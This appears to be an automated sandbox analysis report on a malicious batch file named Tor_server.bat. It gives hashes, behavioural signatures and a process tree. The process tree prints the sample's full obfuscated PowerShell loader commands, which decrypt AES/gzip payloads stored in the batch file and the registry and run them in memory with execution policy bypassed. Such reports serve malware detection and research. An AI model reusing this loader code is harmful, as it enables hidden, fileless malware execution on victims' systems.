Analysis

  • max time kernel
    152s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-04-2023 21:49

General

  • Target

    Tor_server.bat

  • Size

    13.3MB

  • MD5

    5b78770d26a9fd2865d946e15f6d3461

  • SHA1

    54f53ee915d14564c306d085ec7a13f605248cf1

  • SHA256

    4fa4c520361ee63e7d28a5a636bdd0cd20faf998d1561d38184904ea97e37e18

  • SHA512

    afa04485c331796f399865c9e01763979a9c52236f2e8726352685be88f05c1cdc46f40b1366832a119872a025247cde158373d52c98ba40099a61658bdd161a

  • SSDEEP

    49152:R8PZBvM7+OPeFknvKYEO5fkqB31m3Ei+vrojMj1YqmyljkjK5qGiuJ6hpTlNJkvM:i

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:688
  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{dfbcdb46-e7d9-4b6a-ba61-854be5cb44ca}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1452
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{9f0e5c36-78ae-49d9-b9e8-d3125b9afd7e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{49130c1f-2e2a-432e-9c81-7836080cd05c}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1704
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8f0dc83e-6be6-4761-8321-080ab83c9dde}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2236
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{3da72a0f-c863-461b-b36b-e638656e1936}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3736
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:528
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
          1⤵
            PID:1872
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
            1⤵
              PID:1880
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
              1⤵
                PID:2024
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                1⤵
                  PID:4300
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 4300 -s 372
                    2⤵
                    • Program crash
                    PID:4864
                • C:\Windows\system32\wbem\wmiprvse.exe
                  C:\Windows\system32\wbem\wmiprvse.exe
                  1⤵
                    PID:3672
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                    1⤵
                      PID:2168
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netsvcs -p
                      1⤵
                        PID:1220
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                        1⤵
                          PID:1944
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                          1⤵
                            PID:3824
                          • C:\Windows\system32\SppExtComObj.exe
                            C:\Windows\system32\SppExtComObj.exe -Embedding
                            1⤵
                              PID:3916
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                              1⤵
                                PID:4988
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                1⤵
                                  PID:5048
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                  1⤵
                                    PID:4224
                                  • C:\Windows\System32\RuntimeBroker.exe
                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                    1⤵
                                      PID:5116
                                    • C:\Windows\System32\RuntimeBroker.exe
                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                      1⤵
                                        PID:4092
                                      • C:\Windows\System32\RuntimeBroker.exe
                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                        1⤵
                                          PID:3704
                                        • C:\Windows\system32\DllHost.exe
                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                          1⤵
                                            PID:3496
                                            • C:\Windows\system32\WerFault.exe
                                              C:\Windows\system32\WerFault.exe -u -p 3496 -s 468
                                              2⤵
                                              • Program crash
                                              PID:3960
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                            1⤵
                                              PID:3304
                                            • C:\Windows\Explorer.EXE
                                              C:\Windows\Explorer.EXE
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3116
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Tor_server.bat"
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4772
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  3⤵
                                                    PID:2016
                                                  • C:\Users\Admin\AppData\Local\Temp\Tor_server.bat.exe
                                                    "Tor_server.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function uuyaK($wQlbu){ $Egnpc=[System.Security.Cryptography.Aes]::Create(); $Egnpc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Egnpc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Egnpc.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('utt18sMXths75eOv2gaMm/uDEi56oUhkOfCdq6XsWl4='); $Egnpc.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UAhcHc4T2j6r3WvRbQ2hYQ=='); $KyoMC=$Egnpc.CreateDecryptor(); $return_var=$KyoMC.TransformFinalBlock($wQlbu, 0, $wQlbu.Length); $KyoMC.Dispose(); $Egnpc.Dispose(); $return_var;}function HEAnP($wQlbu){ $Anixn=New-Object System.IO.MemoryStream(,$wQlbu); $lwnyf=New-Object System.IO.MemoryStream; $zWCNb=New-Object System.IO.Compression.GZipStream($Anixn, [IO.Compression.CompressionMode]::Decompress); $zWCNb.CopyTo($lwnyf); $zWCNb.Dispose(); $Anixn.Dispose(); $lwnyf.Dispose(); $lwnyf.ToArray();}function yUxUM($wQlbu,$cKmgu){ $nmDQR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$wQlbu); $PBuhY=$nmDQR.EntryPoint; $PBuhY.Invoke($null, $cKmgu);}$DeBef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Tor_server.bat').Split([Environment]::NewLine);foreach ($Iexhf in $DeBef) { if ($Iexhf.StartsWith(':: ')) { $AYYIU=$Iexhf.Substring(3); break; }}$YSbzR=[string[]]$AYYIU.Split('\');$vklec=HEAnP (uuyaK ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YSbzR[0])));$OKwsG=HEAnP (uuyaK ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YSbzR[1])));yUxUM $OKwsG (,[string[]] (''));yUxUM $vklec (,[string[]] (''));
                                                    3⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    • Suspicious use of SetThreadContext
                                                    • Drops file in Windows directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3384
                                                    • C:\Windows\$sxr-powershell.exe
                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                      4⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Executes dropped EXE
                                                      • Drops file in System32 directory
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of SetWindowsHookEx
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2164
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3700
                                                      • C:\Windows\$sxr-powershell.exe
